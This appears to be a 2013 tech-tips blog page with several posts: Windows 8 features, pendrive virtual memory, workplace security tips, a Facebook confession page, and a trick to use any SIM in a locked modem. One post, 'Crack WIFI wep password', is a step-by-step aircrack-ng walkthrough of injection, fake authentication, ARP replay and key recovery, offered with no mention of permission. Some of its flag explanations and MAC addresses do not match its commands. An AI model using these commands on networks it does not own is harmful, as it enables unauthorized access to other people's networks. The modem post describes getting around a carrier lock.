Friday, June 28, 2013

Windows 8 key features over its predecessor Win 7


1- Fast booting process
2- windows to go feature ( most fantastic and mind blowing feature)
3- Metro
4- apps for different purposes

How to use Pendrive as RAM

-for XP

Insert your pen-drive. Let your PC read it.
(Minimum 2 GB)
Right click on My Computer.

Click on Properties from context menu.

Click on Advanced tab.

Click on Settings under Performance.

Click on Advanced tab.

Click on Change button under Virtual memory. Select your USB drive.

Click on custom size radio button and give the values as follows;

Initial Size:1020

Maximum size:1020

The size depends upon your free memory capacity of your pen drive. So you can change this limit according to your pen drive size. Click on Set button, then click on OK.

Now you have to restart the computer. The speed of your computer will be increase !

For Windows 7:
Plug in your pendrive-> Format with NTFS or FAT32

Now go to properties->Select Ready Boost Check Use this device->Choose maximum space to reserve system speed Click on Apply and OK. Your ready boost Pen Drive is ready Now to Use.

Here is an personal suggestion HP and Scandisk is the Best for this work so what are you waiting for.

10 Ways to Work More Securely

1. Work with your IT department
Make sure that you install all of the patches and updates that your IT department recommends. In addition to installing Windows and Office updates, your IT department might require you to install additional security software, such as a firewall or custom software to help you connect from remote locations. Making these regular installations will keep your computer and your company's network as secure as possible.

2. Use strong passwords
Passwords provide the first line of defense against unauthorized access to your computer, and a good password is often underestimated. Weak passwords provide attackers with easy access to your computer and network. Strong passwords are considerably harder to crack, even with the latest password-cracking software.
A strong password:
Is at least eight characters long.
Does not contain your user name, real name, or company name.
Does not contain a complete dictionary word.
Is significantly different from previous passwords. Passwords that change just slightly—such as Password1, Password2, Password3—are not strong.
Contains characters from each of the following groups:
Uppercase and/or lowercase letters.
Numbers
Symbols (!,@,#,$,%, etc.)

3. Don't enable the Save Password option
Make it mandatory for you—or someone else trying to access your computer—to enter your password on all operating system or application settings. If a dialog box prompts you about remembering the password, rather then requiring you to enter it, just choose no. Allowing the password to be saved negates having the password at all.

4. Use network file shares instead of local file shares
Rather than opening up your computer to co-workers, use network file shares to collaborate on documents. And restrict access to the network file share to only those who need it. If you're working on a team, you have lots of other options—for example, Microsoft SharePoint Workspace 2010.

5. Lock your computer when you leave your desk
If you're going to be away from your desk for a while, make sure your computer is locked.
To lock your computer:
On your keyboard, press CTRL+ALT+DELETE at the same time.
Click Lock this computer (Lock Computer if you're running Windows XP).
To unlock your computer, press CTRL+ALT+DELETE and enter your password.

6. Use password protection on your screensaver
Sometimes you're away from your desk for longer than you unexpected. Plan for those situations by setting up your computer so that it locks itself after a specified amount of time.

To establish Windows 7 screensaver password protection
Right click an empty space on your desktop.
Click Personalize, and then click the Screen Saver section.
Change Wait time to 10 minutes or less.
Select On resume, display logon screen.
Click Apply.
To establish Windows Vista screensaver password protection
Right click an empty space on your desktop.
Click Personalize, and then click the Screen Saver section.
Change Wait time to 10 minutes or less.
Select On resume, password protect.
Click Apply.
To establish Windows XP screensaver password protection
Right click an empty space on your desktop.
Click Properties, and then the Screen Saver tab.
Change Wait time to 10 minutes or less.
Select On resume, password protect.
Click Apply.
7. Encrypt files containing confidential or business critical files
You keep valuable and sensitive data on your computer. You might have sensitive information about your company or clients, or your personal bank statements on a laptop you use at home and work. Encrypting your data keeps it as secure as possible. To help keep unauthorized people from accessing your data—even if your computer is lost or stolen—you should encrypt all sensitive data. In the Enterprise and Ultimate editions of Windows Vista, you can use BitLocker™ Drive Encryption to encrypt the entire volume. In Windows XP and all editions of Windows Vista, you can use the Encrypting File System (EFS) to protect important files. We highly recommend that you learn how to encrypt a file or folder to keep it safe.

8. Don't open questionable emails
If an email message just doesn't look right, it probably isn't. Forward the email message to your IT administrator to verify before you open it.

9. Encrypt email messages when appropriate
If you're sending confidential or business-critical information, encrypt the email and any files attached to it. Only recipients who have the private key that matches the public key you used to encrypt the message can read it.

10. Use the Junk Email Filter in Outlook
Receiving spam, or junk email messages, isn't just annoying. Some spam can include potentially harmful viruses that can cause damage to your computer and your company's network. The Junk Email Filter reduces the amount of junk email messages, or spam, you receive in your Inbox. Good news—if your junk mail filter is already active. But you can always change the settings.

Thursday, June 27, 2013

How to Create Confession page on Facebook !!!



Step 1 : Login to your Facebook account.

Step 2 : Click on create a page which you will find it very easily.

Step 3 : Now select Cause or Community and then write the name of the page Eg : Abc confession

Step 4 : Click on get Started and now you have created a page

Step 5: Next you have to update your page cover pic and page profile pic of Your Desire that suits your Confession page. Invite your friends, family members to like the page. Every thing is done with the Facebook page now you need to link it with the Anonymous form

CREATE AND LINK A FORM USING GOOGLE DOCS.

Step 1: Goto https://docs.google.com/ and sign up an account)

Step 2 : Click on Create and Select the Form option from there.

Step 3 : Now choose the Theme and fill the Complete Form.

Step 4 : Next you have to click on Add items and select Paragraph Text

Step 5 : Customize the blank Fields and save it.

Step 6 : Next you have to click on View live Form and copy the URL.

Step 7 : Now click on Choose response Destination and Select new Spreadsheet, Name it and then save it.

Step 8 : Now paste the URL on the Facebook and ask People to Click on the link and confess.

Whenever someone will fill the form you will get a message.

Crack WIFI wep password



To crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.
Equipments used
Wifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)
Software : Backtrack 4 (Free download from http://www.backtrack-linux.org/)
Step 1 – Start the wireless interface in monitor mode on AP channel

airmon-ng start wlan1 6
starts wifi interface in channel 6
Step 2 – Test Wireless Device Packet Injection

aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1
-9 means injection
-a 00:1B:11:24:27:2E is the access point MAC address
Step 3 – Start airodump-ng to capture the IVs

airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1
Step 4 – Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.
aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
-1 means fake authentication
0 reassociation timing in seconds
-e infosec is the wireless network name
-a 00:14:6C:7E:40:80 is the access point MAC address
-h 00:0F:B5:88:AC:82 is our card MAC address
OR
aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
2 – Reauthenticate every 2 seconds.
-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.
-q 10 – Send keep alive packets every 10 seconds.
Troubleshooting Tips

Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…
Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”

You would then look for error messages.
If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…
Run: “tcpdump -n -e -s0 -vvv -i wlan1”

Here is a typical tcpdump error message you are looking for:
11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated station
Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.
If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.
Step 5 – Start aireplay-ng in ARP request replay mode

aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1
Step 6 – Run aircrack-ng to obtain the WEP key

aircrack-ng -b 00:1B:11:24:27:2E output*.cap

USE ANY SIM IN ANY MODEM WITHOUT UNLOCKING IT



We all know that, we cannot use any sim in any modem without unlocking the modem.
But its now possible using Nokia PC suite.

To get this Trick working
Follow the Steps below :

1) Insert the sim inside the modem and connect it to the PC.

2) It will display the message as invalid sim, ignore that message and Open the Nokia PC suite.

3) Click on Connect to Internet option in PC suite.

4) Goto Configure. Select your datacard modem, and make all operator apn setting as like when we use nokia mobile connection.

5) Finish the setup and connect toInternet through PC suite.

6) Now your net is connected without any unlocking

Samsung Galaxy S4 Active is a waterproof S4, out this summer